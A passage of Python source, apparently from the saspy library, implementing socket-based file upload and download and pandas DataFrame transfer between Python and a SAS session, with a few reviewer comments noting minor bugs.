    overwrite  - overwrite the output file if it exists?
    permission - permissions to set on the new file. See SAS Filename Statement Doc for syntax

    Client-socket variant: this side listens and SAS connects out to us
    (optionally through an ssh tunnel). Returns a dict with Success and LOG.
    """
    valid = self._sb.file_info(remotefile, quiet = True)
    if valid is None:
        remf = remotefile
    else:
        if valid == {}:
            # remote path is a directory; append the local basename
            remf = remotefile + self._sb.hostsep + localfile.rpartition(os.sep)[2]
        else:
            remf = remotefile
            if overwrite == False:
                return {'Success' : False,
                        'LOG'     : "File "+str(remotefile)+" exists and overwrite was set to False. Upload was stopped."}

    port = kwargs.get('port', 0)

    if port==0 and self.sascfg.tunnel:
        # we are using a tunnel; default to that port
        port = self.sascfg.tunnel

    # where SAS should connect back to: our IP over ssh, localhost through a
    # tunnel, or '' (same host) for a local subprocess
    if self.sascfg.ssh:
        if not self.sascfg.tunnel:
            host = self.sascfg.hostip #socks.gethostname()
        else:
            host = 'localhost'
    else:
        host = ''

    try:
        fd = open(localfile, 'rb')
    except OSError as e:
        return {'Success' : False,
                'LOG'     : "File "+str(localfile)+" could not be opened. Error was: "+str(e)}

    try:
        sock = socks.socket()
        if self.sascfg.tunnel:
            sock.bind(('localhost', port))
        else:
            sock.bind(('', port))
        # port 0 lets the OS pick; retrieve the actual port for the SAS code
        port = sock.getsockname()[1]
    except OSError:
        # NOTE(review): fd stays open on this path — minor leak
        return {'Success' : False,
                'LOG'     : "Error try to open a socket in the upload method. Call failed."}

    # SAS side: connect to us and copy everything received to the target file
    code = """
filename saspydir '"""+remf+"""' recfm=F encoding=binary lrecl=1 permission='"""+permission+"""';
filename sock socket '"""+host+""":"""+str(port)+"""' recfm=S lrecl=4096;
/* filename sock socket '"""+host+""":"""+str(port)+"""' recfm=S encoding=binary lrecl=4096; */
data _null_; nb = -1;
infile sock nbyte=nb;
file saspydir;
input;
put _infile_;
run;
filename saspydir;
filename sock;\n"""

    sock.listen(1)
    self._asubmit(code, 'text')

    # give SAS 10 seconds to connect back; otherwise it errored out
    if sel.select([sock],[],[],10)[0] == []:
        print("error occured in SAS during upload. Check the returned LOG for issues.")
        sock.close()
        fd.close()
        ll = self.submit("", 'text')
        return {'Success' : False,
                'LOG'     : "Failure in upload.\n"+ll['LOG']}

    newsock = (0,0)
    try:
        newsock = sock.accept()
        while True:
            buf  = fd.read1(4096)
            sent = 0
            send = len(buf)
            blen = send
            if blen:
                while send:
                    try:
                        sent = 0
                        sent = newsock[0].send(buf[blen-send:blen])
                    except (BlockingIOError):
                        pass   # non-blocking send not ready; retry
                    send -= sent
            else:
                # EOF: shut the socket so SAS sees end of data
                newsock[0].shutdown(socks.SHUT_RDWR)
                newsock[0].close()
                sock.close()
                fd.close()
                break
    except (KeyboardInterrupt, Exception) as e:
        try:
            if newsock[0]:
                newsock[0].shutdown(socks.SHUT_RDWR)
                newsock[0].close()
        except:
            pass
        sock.close()
        fd.close()
        ll = self.submit("", 'text')
        # NOTE(review): message says 'Download' in an upload path — likely copy/paste
        return {'Success' : False,
                'LOG'     : "Download was interupted. Returning the SAS log:\n\n"+str(e)+"\n\n"+ll['LOG']}

    # empty submit collects the LOG produced by the DATA step above
    ll = self.submit("", 'text')
    return {'Success' : True,
            'LOG'     : ll['LOG']}
def download(self, localfile: str, remotefile: str, overwrite: bool = True, **kwargs):
    """
    This method downloads a remote file from the SAS servers file system.
    localfile  - path to the local file to create or overwrite
    remotefile - path to remote file to download
    overwrite  - overwrite the output file if it exists?
                 NOTE(review): overwrite is accepted but never checked in this
                 body — the local file is always opened 'wb'; confirm intended

    SAS connects a socket back to us and streams the file's bytes.
    Returns a dict with Success (bool) and LOG (str).
    """
    valid = self._sb.file_info(remotefile, quiet = True)
    if valid is None:
        return {'Success' : False,
                'LOG'     : "File "+str(remotefile)+" does not exist."}
    if valid == {}:
        return {'Success' : False,
                'LOG'     : "File "+str(remotefile)+" is a directory."}

    # if the local target is a directory, append the remote file's basename
    if os.path.isdir(localfile):
        locf = localfile + os.sep + remotefile.rpartition(self._sb.hostsep)[2]
    else:
        locf = localfile

    try:
        fd = open(locf, 'wb')
    except OSError as e:
        return {'Success' : False,
                'LOG'     : "File "+str(locf)+" could not be opened. Error was: "+str(e)}

    port = kwargs.get('port', 0)

    if port==0 and self.sascfg.tunnel:
        # we are using a tunnel; default to that port
        port = self.sascfg.tunnel

    try:
        sock = socks.socket()
        if self.sascfg.tunnel:
            sock.bind(('localhost', port))
        else:
            sock.bind(('', port))
        # port 0 lets the OS pick; retrieve the actual port for the SAS code
        port = sock.getsockname()[1]
    except OSError:
        # NOTE(review): fd stays open on this path — minor leak
        return {'Success' : False,
                'LOG'     : "Error try to open a socket in the download method. Call failed."}

    # where SAS should connect back to (see _upload_client for the cases)
    if self.sascfg.ssh:
        if not self.sascfg.tunnel:
            host = self.sascfg.hostip #socks.gethostname()
        else:
            host = 'localhost'
    else:
        host = ''

    # SAS side: read the remote file and write its bytes to our socket
    code = """
filename saspydir '"""+remotefile+"""' recfm=F encoding=binary lrecl=4096;
filename sock socket '"""+host+""":"""+str(port)+"""' recfm=S lrecl=4096;
/* filename sock socket '"""+host+""":"""+str(port)+"""' recfm=S encoding=binary; */
data _null_;
file sock;
infile saspydir;
input;
put _infile_;
run;\n"""

    sock.listen(1)
    self._asubmit(code, 'text')

    # give SAS 10 seconds to connect back; otherwise it errored out
    if sel.select([sock],[],[],10)[0] == []:
        print("error occured in SAS during download. Check the returned LOG for issues.")
        sock.close()
        fd.close()
        ll = self.submit("", 'text')
        return {'Success' : False,
                'LOG'     : "Failure in download.\n"+ll['LOG']}

    datar = b''
    newsock = (0,0)
    try:
        newsock = sock.accept()
        while True:
            data = newsock[0].recv(4096)
            if len(data):
                datar += data
            else:
                # peer closed the socket: flush whatever is buffered and stop
                if len(datar):
                    fd.write(datar)
                break
            # flush in 8K slices so the buffer stays small on big files
            if len(datar) > 8300:
                fd.write(datar[:8192])
                datar = datar[8192:]
    except (KeyboardInterrupt, Exception) as e:
        try:
            if newsock[0]:
                newsock[0].shutdown(socks.SHUT_RDWR)
                newsock[0].close()
        except:
            pass
        sock.close()
        fd.close()
        ll = self.submit("filename saspydir;", 'text')
        return {'Success' : False,
                'LOG'     : "Download was interupted. Returning the SAS log:\n\n"+str(e)+"\n\n"+ll['LOG']}

    newsock[0].shutdown(socks.SHUT_RDWR)
    newsock[0].close()
    sock.close()

    fd.flush()
    fd.close()

    # clear the remote fileref and collect the LOG from the DATA step
    ll = self.submit("filename saspydir;", 'text')
    return {'Success' : True,
            'LOG'     : ll['LOG']}
def _getbytelenF(self, x):
return len(x.encode(self.sascfg.encoding))
def _getbytelenR(self, x):
return len(x.encode(self.sascfg.encoding, errors='replace'))
def dataframe2sasdata(self, df: '<Pandas Data Frame object>', table: str ='a',
                      libref: str ="", keep_outer_quotes: bool=False,
                      embedded_newlines: bool=True,
                      LF: str = '\x01', CR: str = '\x02',
                      colsep: str = '\x03', colrep: str = ' ',
                      datetimes: dict={}, outfmts: dict={}, labels: dict={},
                      outdsopts: dict={}, encode_errors = None, char_lengths = None,
                      **kwargs):
    """
    This method imports a Pandas Data Frame to a SAS Data Set, returning the SASdata object for the new Data Set.
    df      - Pandas Data Frame to import to a SAS Data Set
    table   - the name of the SAS Data Set to create
    libref  - the libref for the SAS Data Set being created. Defaults to WORK, or USER if assigned
    keep_outer_quotes - for character columns, have SAS keep any outer quotes instead of stripping them off.
    embedded_newlines - if any char columns have embedded CR or LF, set this to True to get them imported into the SAS data set
    LF      - if embedded_newlines=True, the character to use for LF when transferring the data; defaults to '\x01'
    CR      - if embedded_newlines=True, the character to use for CR when transferring the data; defaults to '\x02'
    colsep  - the column seperator character used for streaming the delimmited data to SAS defaults to '\x03'
    datetimes - dict with column names as keys and values of 'date' or 'time' to create SAS date or times instead of datetimes
    outfmts - dict with column names and SAS formats to assign to the new SAS data set
    labels  - dict with column names and SAS Labels to assign to the new SAS data set
    outdsopts - a dictionary containing output data set options for the table being created
    encode_errors - 'fail' or 'replace' - default is to 'fail', other choice is to 'replace' invalid chars with the replacement char
    char_lengths - How to determine (and declare) lengths for CHAR variables in the output SAS data set

    Data is streamed to SAS over a socket (a SAS 'filename sock socket' fileref);
    kwargs may carry 'port' (socket port; 0 = ephemeral) and 'blocksize' (bytes
    buffered before each socket send; default 32767).
    Returns None on success, -1 if char lengths could not be determined, or the
    row number reached when a transcoding/socket failure stopped the transfer.
    """
    input  = ""
    xlate  = ""
    card   = ""
    format = ""
    length = ""
    label  = ""
    dts    = []
    ncols  = len(df.columns)

    # Hex literals for the transfer control characters, in the session encoding.
    lf    = "'"+'%02x' % ord(LF.encode(self.sascfg.encoding))+"'x"
    cr    = "'"+'%02x' % ord(CR.encode(self.sascfg.encoding))+"'x "
    delim = "'"+'%02x' % ord(colsep.encode(self.sascfg.encoding))+"'x "

    # SAS names are case-insensitive, so all user-supplied dicts are keyed uppercase.
    dts_upper = {k.upper():v for k,v in datetimes.items()}
    dts_keys  = dts_upper.keys()
    fmt_upper = {k.upper():v for k,v in outfmts.items()}
    fmt_keys  = fmt_upper.keys()
    lab_upper = {k.upper():v for k,v in labels.items()}
    lab_keys  = lab_upper.keys()

    if encode_errors is None:
        encode_errors = 'fail'

    # Determine CHAR column byte lengths, computing them from the df unless a
    # complete dict was provided.
    if type(char_lengths) is not dict or len(char_lengths) < ncols:
        charlens = self._sb.df_char_lengths(df, encode_errors, char_lengths)
    else:
        charlens = char_lengths

    if charlens is None:
        return -1
    chr_upper = {k.upper():v for k,v in charlens.items()}

    if type(df.index) != pd.RangeIndex:
        warnings.warn("Note that Indexes are not transferred over as columns. Only actual coulmns are transferred")

    # Build the INPUT/LENGTH/FORMAT/LABEL statements and the per-column type
    # codes ('C'har, 'D'atetime, 'B'ool, 'N'umeric) used when streaming rows.
    for name in df.columns:
        colname = str(name)
        col_up  = colname.upper()
        input  += "'"+colname+"'n "
        if col_up in lab_keys:
            label += "label '"+colname+"'n ="+lab_upper[col_up]+";\n"
        if col_up in fmt_keys:
            format += "'"+colname+"'n "+fmt_upper[col_up]+" "

        if df.dtypes[name].kind in ('O','S','U','V'):
            try:
                length += " '"+colname+"'n $"+str(chr_upper[col_up])
            except KeyError as e:
                print("Dictionary provided as char_lengths is missing column: "+colname)
                raise e
            if keep_outer_quotes:
                input += "~ "
            dts.append('C')
            if embedded_newlines:
                # Reverse the LF/CR substitution done while streaming the rows.
                xlate += " '"+colname+"'n = translate('"+colname+"'n, '0A'x, "+lf+");\n"
                xlate += " '"+colname+"'n = translate('"+colname+"'n, '0D'x, "+cr+");\n"
        else:
            if df.dtypes[name].kind in ('M'):
                length += " '"+colname+"'n 8"
                input  += ":B8601DT26.6 "
                if col_up not in dts_keys:
                    if col_up not in fmt_keys:
                        format += "'"+colname+"'n E8601DT26.6 "
                else:
                    if dts_upper[col_up].lower() == 'date':
                        if col_up not in fmt_keys:
                            format += "'"+colname+"'n E8601DA. "
                        xlate += " '"+colname+"'n = datepart('"+colname+"'n);\n"
                    else:
                        if dts_upper[col_up].lower() == 'time':
                            if col_up not in fmt_keys:
                                format += "'"+colname+"'n E8601TM. "
                            xlate += " '"+colname+"'n = timepart('"+colname+"'n);\n"
                        else:
                            print("invalid value for datetimes for column "+colname+". Using default.")
                            if col_up not in fmt_keys:
                                format += "'"+colname+"'n E8601DT26.6 "
                dts.append('D')
            else:
                length += " '"+colname+"'n 8"
                if df.dtypes[name] == 'bool':
                    dts.append('B')
                else:
                    dts.append('N')

    port = kwargs.get('port', 0)

    # Two connection topologies: 'server' (SAS opens the listening socket via a
    # reverse tunnel and we connect to it) vs. default (we listen, SAS connects).
    if self.sascfg.ssh and self.sascfg.rtunnel and port == 0:
        # we are using a rtunnel; default to that port
        server = True
        port = self.sascfg.rtunnel
        host = 'localhost'
        code = """filename sock socket ':"""+str(port)+"""' server reconn=0 recfm=V termstr=LF;\n"""
    else:
        server = False
        if port==0 and self.sascfg.tunnel:
            # we are using a tunnel; default to that port
            port = self.sascfg.tunnel

        if self.sascfg.ssh:
            if not self.sascfg.tunnel:
                host = self.sascfg.hostip #socks.gethostname()
            else:
                host = 'localhost'
        else:
            host = ''

        try:
            sock = socks.socket()
            if self.sascfg.tunnel:
                sock.bind(('localhost', port))
            else:
                sock.bind(('', port))
            port = sock.getsockname()[1]
        except OSError as e:
            raise e

        code = """filename sock socket '"""+host+""":"""+str(port)+"""' recfm=V termstr=LF;\n"""

    # Assemble the DATA step that reads the socket and writes the data set.
    code += "data "
    if len(libref):
        code += libref+"."
    code += "'"+table.strip()+"'n"

    if len(outdsopts):
        code += '('
        for key in outdsopts:
            code += key+'='+str(outdsopts[key]) + ' '
        code += ");\n"
    else:
        code += ";\n"

    if len(length):
        code += "length"+length+";\n"
    if len(format):
        code += "format "+format+";\n"
    code += label
    code += "infile sock nbyte=nb delimiter="+delim+" STOPOVER;\ninput @;\nif _infile_ = '' then delete;\n"
    code += "else do;\n input "+input+";\n"+xlate+";\nend;\nrun;\nfilename sock;\n"

    if not server:
        sock.listen(1)

    self._asubmit(code, "text")

    if server:
        sleep(1)
        sock = socks.socket()
        sock.connect((host, port))
        ssock = sock

    if not server:
        # Wait up to 10s for SAS to connect; if it doesn't, something failed in SAS.
        if sel.select([sock],[],[],10)[0] == []:
            print("error occured in SAS during data transfer. Check the LOG for issues.")
            sock.close()
            ll = self.submit("", 'text')
            return {'Success' : False,
                    'LOG'     : "Failure in upload.\n"+ll['LOG']}

        newsock = (0,0)
        try:
            newsock = sock.accept()
        except (KeyboardInterrupt, Exception) as e:
            try:
                if newsock[0]:
                    newsock[0].shutdown(socks.SHUT_RDWR)
                    newsock[0].close()
            except:
                pass
            sock.close()
            print("error occured in SAS during data transfer. Check the LOG for issues.")
            ll = self.submit("", 'text')
            return {'Success' : False,
                    'LOG'     : "Download was interupted. Returning the SAS log:\n\n"+str(e)+"\n\n"+ll['LOG']}

        ssock = newsock[0]

    logf  = b''
    first = True   # in the final flush: have we already retried the send once?
    fail  = False  # in the main loop: has a send already failed once?

    blksz = int(kwargs.get('blocksize', 32767))
    row_num = 0
    code = ""
    for row in df.itertuples(index=False):
        row_num += 1
        card = ""

        # Render one row as a colsep-delimited record, normalizing missing values.
        for col in range(ncols):
            var = str(row[col])

            if dts[col] == 'N' and var == 'nan':
                var = '.'
            elif dts[col] == 'C':
                if var == 'nan' or len(var) == 0:
                    var = ' '
                else:
                    var = var.replace(colsep, colrep)
            elif dts[col] == 'B':
                var = str(int(row[col]))
            elif dts[col] == 'D':
                if var in ['nan', 'NaT', 'NaN']:
                    var = '.'
                else:
                    var = str(row[col].to_datetime64())[:26]

            card += var
            if col < (ncols-1):
                card += colsep

        if embedded_newlines:
            # Swap real newlines for the LF/CR placeholders (undone in SAS by xlate).
            card = card.replace(LF, colrep).replace(CR, colrep)
            card = card.replace('\n', LF).replace('\r', CR)

        code += card+"\n"

        # Flush a block once we've buffered more than blksz characters.
        if len(code) > blksz:
            first = False
            if encode_errors != 'replace':
                try:
                    code = code.encode(self.sascfg.encoding)
                except Exception as e:
                    # Transcoding failure: tear down the socket, surface any LOG
                    # errors, and report how far we got.
                    try:
                        if server:
                            sock.shutdown(socks.SHUT_RDWR)
                        else:
                            if newsock[0]:
                                newsock[0].shutdown(socks.SHUT_RDWR)
                                newsock[0].close()
                    except:
                        pass
                    sock.close()

                    logd = logf.decode(self.sascfg.encoding, errors='replace')
                    self._log += logd
                    if logd.count('ERROR:') > 0:
                        warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
                        self._sb.check_error_log = True

                    ll = self.submit("", 'text')
                    print("Transcoding error encountered. Data transfer stopped on or before row "+str(row_num))
                    print("DataFrame contains characters that can't be transcoded into the SAS session encoding.\n"+str(e))
                    return row_num
            else:
                code = code.encode(self.sascfg.encoding, errors='replace')

            sent = 0
            send = len(code)
            blen = send
            while send:
                try:
                    sent = 0
                    sent = ssock.send(code[blen-send:blen])
                except (BlockingIOError):
                    pass
                except (OSError) as e:
                    if fail:
                        # Second failure: give up and report progress.
                        try:
                            if server:
                                sock.shutdown(socks.SHUT_RDWR)
                            else:
                                if newsock[0]:
                                    newsock[0].shutdown(socks.SHUT_RDWR)
                                    newsock[0].close()
                        except:
                            pass
                        sock.close()
                        print("Failed connecting to server socket. Check the SASLOG to see the error")
                        ll = self.submit("", 'text')
                        return row_num
                    fail = True
                    if server:
                        # Reconnect once in server (rtunnel) mode and retry.
                        sock.close()
                        sock = socks.socket()
                        sock.connect((host, port))
                        ssock = sock
                        sleep(1)
                    pass
                send -= sent
            code = ""

            # Drain any pending SAS stderr (the LOG) so the pipe doesn't fill up.
            if os.name == 'nt':
                try:
                    log = self.stderr.get_nowait()
                except Empty:
                    log = b''
            else:
                log = self.stderr.read1(4096)

            if len(log) > 0:
                logf += log
                logd = logf.decode(self.sascfg.encoding, errors='replace')
                self._log += logd
                if logd.count('ERROR:') > 0:
                    warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
                    self._sb.check_error_log = True

    # Flush whatever is left in the buffer after the last row.
    if len(code):
        if encode_errors != 'replace':
            try:
                code = code.encode(self.sascfg.encoding)
            except Exception as e:
                try:
                    if server:
                        sock.shutdown(socks.SHUT_RDWR)
                    else:
                        if newsock[0]:
                            newsock[0].shutdown(socks.SHUT_RDWR)
                            newsock[0].close()
                except:
                    pass
                sock.close()
                ll = self.submit("", 'text')
                print("Transcoding error encountered. Data transfer stopped on row "+str(row_num))
                print("DataFrame contains characters that can't be transcoded into the SAS session encoding.\n"+str(e))
                return row_num
        else:
            code = code.encode(self.sascfg.encoding, errors='replace')

        sent = 0
        send = len(code)
        blen = send
        while send:
            try:
                sent = 0
                sent = ssock.send(code[blen-send:blen])
            except (BlockingIOError):
                pass
            except (OSError) as e:
                # BUG FIX: removed leftover debug statement print('first') that
                # wrote junk to the console on every socket error here.
                if not first:
                    try:
                        if server:
                            sock.shutdown(socks.SHUT_RDWR)
                        else:
                            if newsock[0]:
                                newsock[0].shutdown(socks.SHUT_RDWR)
                                newsock[0].close()
                    except:
                        pass
                    sock.close()
                    print("Failed connecting to server socket. Check the SASLOG to see the error")
                    ll = self.submit("", 'text')
                    return row_num
                first = False
                if server:
                    sock.close()
                    sock = socks.socket()
                    sock.connect((host, port))
                    ssock = sock
                    sleep(1)
                pass
            send -= sent

    # Normal shutdown: close the data socket so the SAS DATA step hits EOF.
    try:
        if server:
            sock.shutdown(socks.SHUT_RDWR)
        else:
            newsock[0].shutdown(socks.SHUT_RDWR)
            newsock[0].close()
    except:
        pass
    sock.close()

    ll = self.submit("", 'text')
    return None
def dataframe2sasdataORIG(self, df: '<Pandas Data Frame object>', table: str ='a',
                          libref: str ="", keep_outer_quotes: bool=False,
                          embedded_newlines: bool=True,
                          LF: str = '\x01', CR: str = '\x02',
                          colsep: str = '\x03', colrep: str = ' ',
                          datetimes: dict={}, outfmts: dict={}, labels: dict={},
                          outdsopts: dict={}, encode_errors = None, char_lengths = None,
                          **kwargs):
    """
    This method imports a Pandas Data Frame to a SAS Data Set, returning the SASdata object for the new Data Set.
    df      - Pandas Data Frame to import to a SAS Data Set
    table   - the name of the SAS Data Set to create
    libref  - the libref for the SAS Data Set being created. Defaults to WORK, or USER if assigned
    keep_outer_quotes - for character columns, have SAS keep any outer quotes instead of stripping them off.
    embedded_newlines - if any char columns have embedded CR or LF, set this to True to get them iported into the SAS data set
    LF      - if embedded_newlines=True, the chacter to use for LF when transferring the data; defaults to '\x01'
    CR      - if embedded_newlines=True, the chacter to use for CR when transferring the data; defaults to '\x02'
    colsep  - the column seperator character used for streaming the delimmited data to SAS defaults to '\x03'
    datetimes - dict with column names as keys and values of 'date' or 'time' to create SAS date or times instead of datetimes
    outfmts - dict with column names and SAS formats to assign to the new SAS data set
    labels  - dict with column names and SAS Labels to assign to the new SAS data set
    outdsopts - a dictionary containing output data set options for the table being created
    encode_errors - 'fail' or 'replace' - default is to 'fail', other choice is to 'replace' invalid chars with the replacement char
    char_lengths - How to determine (and declare) lengths for CHAR variables in the output SAS data set

    NOTE(review): this appears to be the retained original (pre-socket) implementation,
    streaming the rows through the SAS session's stdin pipe as DATALINES4 cards,
    rather than over a socket like dataframe2sasdata.
    """
    input  = ""
    xlate  = ""
    card   = ""
    format = ""
    length = ""
    label  = ""
    dts    = []
    ncols  = len(df.columns)

    # Hex literals for the transfer control characters, in the session encoding.
    lf    = "'"+'%02x' % ord(LF.encode(self.sascfg.encoding))+"'x"
    cr    = "'"+'%02x' % ord(CR.encode(self.sascfg.encoding))+"'x "
    delim = "'"+'%02x' % ord(colsep.encode(self.sascfg.encoding))+"'x "

    # Unlike dataframe2sasdata, these dicts are matched case-sensitively.
    dtkeys  = datetimes.keys()
    fmtkeys = outfmts.keys()
    labkeys = labels.keys()

    if encode_errors is None:
        encode_errors = 'fail'

    # bpc = bytes per char of the Python-side encoding; CnotB is computed but
    # not referenced later in this method (appears vestigial).
    bpc = self._sb.pyenc[0]
    if char_lengths and str(char_lengths).strip() in ['1','2','3','4']:
        bpc = int(char_lengths)
    if char_lengths and str(char_lengths) == 'exact':
        CnotB = False
    else:
        CnotB = bpc == 1

    # Determine CHAR column byte lengths unless a dict was provided.
    if type(char_lengths) is not dict:
        charlens = self._sb.df_char_lengths(df, encode_errors, char_lengths)
    else:
        charlens = char_lengths

    if charlens is None:
        return -1
    charlens = {k.upper():v for k,v in charlens.items()}

    # Build INPUT/LENGTH/FORMAT/LABEL statements and per-column type codes
    # ('C'har, 'D'atetime, 'B'ool, 'N'umeric) used when streaming rows.
    for name in df.columns:
        colname = str(name)
        input += "'"+colname+"'n "
        if colname in labkeys:
            label += "label '"+colname+"'n ="+labels[colname]+";\n"

        if df.dtypes[name].kind in ('O','S','U','V'):
            try:
                length += " '"+colname+"'n $"+str(charlens[colname.upper()])
            except KeyError as e:
                print("Dictionary provided as char_lengths is missing column: "+colname)
                raise e
            if colname in fmtkeys:
                format += "'"+colname+"'n "+outfmts[colname]+" "
            if keep_outer_quotes:
                input += "~ "
            dts.append('C')
            if embedded_newlines:
                # Reverse the LF/CR substitution done while streaming the rows.
                xlate += " '"+colname+"'n = translate('"+colname+"'n, '0A'x, "+lf+");\n"
                xlate += " '"+colname+"'n = translate('"+colname+"'n, '0D'x, "+cr+");\n"
        else:
            if df.dtypes[name].kind in ('M'):
                length += " '"+colname+"'n 8"
                input  += ":B8601DT26.6 "
                if colname not in dtkeys:
                    if colname in fmtkeys:
                        format += "'"+colname+"'n "+outfmts[colname]+" "
                    else:
                        format += "'"+colname+"'n E8601DT26.6 "
                else:
                    if datetimes[colname].lower() == 'date':
                        if colname in fmtkeys:
                            format += "'"+colname+"'n "+outfmts[colname]+" "
                        else:
                            format += "'"+colname+"'n E8601DA. "
                        xlate += " '"+colname+"'n = datepart('"+colname+"'n);\n"
                    else:
                        if datetimes[colname].lower() == 'time':
                            if colname in fmtkeys:
                                format += "'"+colname+"'n "+outfmts[colname]+" "
                            else:
                                format += "'"+colname+"'n E8601TM. "
                            xlate += " '"+colname+"'n = timepart('"+colname+"'n);\n"
                        else:
                            print("invalid value for datetimes for column "+colname+". Using default.")
                            if colname in fmtkeys:
                                format += "'"+colname+"'n "+outfmts[colname]+" "
                            else:
                                format += "'"+colname+"'n E8601DT26.6 "
                dts.append('D')
            else:
                length += " '"+colname+"'n 8"
                if colname in fmtkeys:
                    format += "'"+colname+"'n "+outfmts[colname]+" "
                if df.dtypes[name] == 'bool':
                    dts.append('B')
                else:
                    dts.append('N')

    # Assemble the DATA step; data arrives inline via DATALINES4 on stdin.
    code = "data "
    if len(libref):
        code += libref+"."
    code += "'"+table.strip()+"'n"

    if len(outdsopts):
        code += '('
        for key in outdsopts:
            code += key+'='+str(outdsopts[key]) + ' '
        code += ");\n"
    else:
        code += ";\n"

    if len(length):
        code += "length"+length+";\n"
    if len(format):
        code += "format "+format+";\n"
    code += label
    code += "infile datalines delimiter="+delim+" STOPOVER;\ninput @;\nif _infile_ = '' then delete;\n"
    code += "else do;\n input "+input+";\n"+xlate+";\nend;\ndatalines4;"
    self._asubmit(code, "text")

    logf = b''

    blksz = int(kwargs.get('blocksize', 32767))
    row_num = 0
    code = ""
    for row in df.itertuples(index=False):
        row_num += 1
        card = ""

        # Render one row as a colsep-delimited record, normalizing missing values.
        for col in range(ncols):
            var = str(row[col])

            if dts[col] == 'N' and var == 'nan':
                var = '.'
            elif dts[col] == 'C':
                if var == 'nan' or len(var) == 0:
                    var = ' '
                else:
                    var = var.replace(colsep, colrep)
            elif dts[col] == 'B':
                var = str(int(row[col]))
            elif dts[col] == 'D':
                if var in ['nan', 'NaT', 'NaN']:
                    var = '.'
                else:
                    var = str(row[col].to_datetime64())[:26]

            card += var
            if col < (ncols-1):
                card += colsep

        if embedded_newlines:
            # Swap real newlines for the LF/CR placeholders (undone in SAS by xlate).
            card = card.replace(LF, colrep).replace(CR, colrep)
            card = card.replace('\n', LF).replace('\r', CR)

        code += card+"\n"

        # Flush a block to the stdin pipe once we've buffered more than blksz chars.
        if len(code) > blksz:
            if encode_errors != 'replace':
                try:
                    code = code.encode(self.sascfg.encoding)
                except Exception as e:
                    # Close out DATALINES4 so the SAS session stays usable.
                    self._asubmit(";;;;\n;;;;", "text")
                    ll = self.submit("quit;", 'text')
                    print("Transcoding error encountered. Data transfer stopped on or before row "+str(row_num))
                    print("DataFrame contains characters that can't be transcoded into the SAS session encoding.\n"+str(e))
                    return row_num
            else:
                code = code.encode(self.sascfg.encoding, errors='replace')
            #self.stdin.write(code+b'\n')
            os.write(self.pin, code+b'\n')
            self.stdin.flush()
            code = ""

            # Drain any pending SAS stderr (the LOG) so the pipe doesn't fill up.
            if os.name == 'nt':
                try:
                    log = self.stderr.get_nowait()
                except Empty:
                    log = b''
            else:
                log = self.stderr.read1(4096)

            if len(log) > 0:
                logf += log
                logd = logf.decode(self.sascfg.encoding, errors='replace')
                self._log += logd
                if logd.count('ERROR:') > 0:
                    warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
                    self._sb.check_error_log = True

    # Flush whatever is left in the buffer after the last row.
    if len(code):
        if encode_errors != 'replace':
            try:
                code = code.encode(self.sascfg.encoding)
            except Exception as e:
                self._asubmit(";;;;\n;;;;", "text")
                ll = self.submit("quit;", 'text')
                print("Transcoding error encountered. Data transfer stopped on row "+str(row_num))
                print("DataFrame contains characters that can't be transcoded into the SAS session encoding.\n"+str(e))
                return row_num
        else:
            code = code.encode(self.sascfg.encoding, errors='replace')
        #self.stdin.write(code+b'\n')
        os.write(self.pin, code+b'\n')
        self.stdin.flush()

    # Terminate the DATALINES4 block and run the step.
    self._asubmit(";;;;\n;;;;", "text")
    ll = self.submit("quit;", 'text')
    return None
def sasdata2dataframe(self, table: str, libref: str ='', dsopts: dict = None,
                      rowsep: str = '\x01', colsep: str = '\x02',
                      rowrep: str = ' ', colrep: str = ' ',
                      port: int=0, wait: int=10, **kwargs) -> '<Pandas Data Frame object>':
    """
    Export a SAS Data Set to a Pandas Data Frame and return it.

    Dispatches to one of the concrete transfer implementations based on the
    optional method= keyword: 'csv' selects the proc-export/CSV path, anything
    else uses the direct streaming (DISK) path.

    table  - the name of the SAS Data Set you want to export to a Pandas Data Frame
    libref - the libref for the SAS Data Set.
    rowsep - the row seperator character to use; defaults to '\x01'
    colsep - the column seperator character to use; defaults to '\x02'
    rowrep - the char to convert to for any embedded rowsep chars, defaults to ' '
    colrep - the char to convert to for any embedded colsep chars, defaults to ' '
    port   - port to use for socket. Defaults to 0 which uses a random available ephemeral port
    wait   - seconds to wait for socket connection from SAS; catches hang if an error in SAS. 0 = no timeout
    """
    if dsopts is None:
        dsopts = {}

    method = kwargs.pop('method', None)
    wants_csv = bool(method) and method.lower() == 'csv'

    if wants_csv:
        return self.sasdata2dataframeCSV(table, libref, dsopts, port=port, wait=wait, **kwargs)
    return self.sasdata2dataframeDISK(table, libref, dsopts, rowsep, colsep,
                                      rowrep, colrep, port=port, wait=wait, **kwargs)
def sasdata2dataframeCSV(self, table: str, libref: str ='', dsopts: dict = None, opts: dict = None,
                         port: int=0, wait: int=10, **kwargs) -> '<Pandas Data Frame object>':
    """
    This method exports the SAS Data Set to a Pandas Data Frame, returning the Data Frame object.
    table   - the name of the SAS Data Set you want to export to a Pandas Data Frame
    libref  - the libref for the SAS Data Set.
    dsopts  - data set options for the input SAS Data Set
    opts    - a dictionary containing any of the following Proc Export options(delimiter, putnames)
    tempfile - DEPRECATED
    tempkeep - DEPRECATED
    port    - port to use for socket. Defaults to 0 which uses a random available ephemeral port
    wait    - seconds to wait for socket connection from SAS; catches hang if an error in SAS. 0 = no timeout

    These two options are for advanced usage. They override how saspy imports data. For more info
    see https://sassoftware.github.io/saspy/advanced-topics.html#advanced-sd2df-and-df2sd-techniques

    dtype   - this is the parameter to Pandas read_csv, overriding what saspy generates and uses
    my_fmts - bool: if True, overrides the formats saspy would use, using those on the data set or in dsopts=

    Flow: interrogate the data set's metadata via the SAS LOG, then have
    PROC EXPORT write CSV into a socket fileref that this process listens on,
    and feed that socket to pandas.read_csv.
    """
    # DEPRECATED options are accepted and discarded.
    tmp = kwargs.pop('tempfile', None)
    tmp = kwargs.pop('tempkeep', None)

    dsopts = dsopts if dsopts is not None else {}
    opts = opts if opts is not None else {}

    if port==0 and self.sascfg.tunnel:
        # we are using a tunnel; default to that port
        port = self.sascfg.tunnel

    if libref:
        tabname = libref+".'"+table.strip()+"'n "
    else:
        tabname = "'"+table.strip()+"'n "

    # Step 1: write LRECL, variable count, names and types to the LOG (STDERR).
    code = "data work.sasdata2dataframe / view=work.sasdata2dataframe; set "+tabname+self._sb._dsopts(dsopts)+";run;\n"
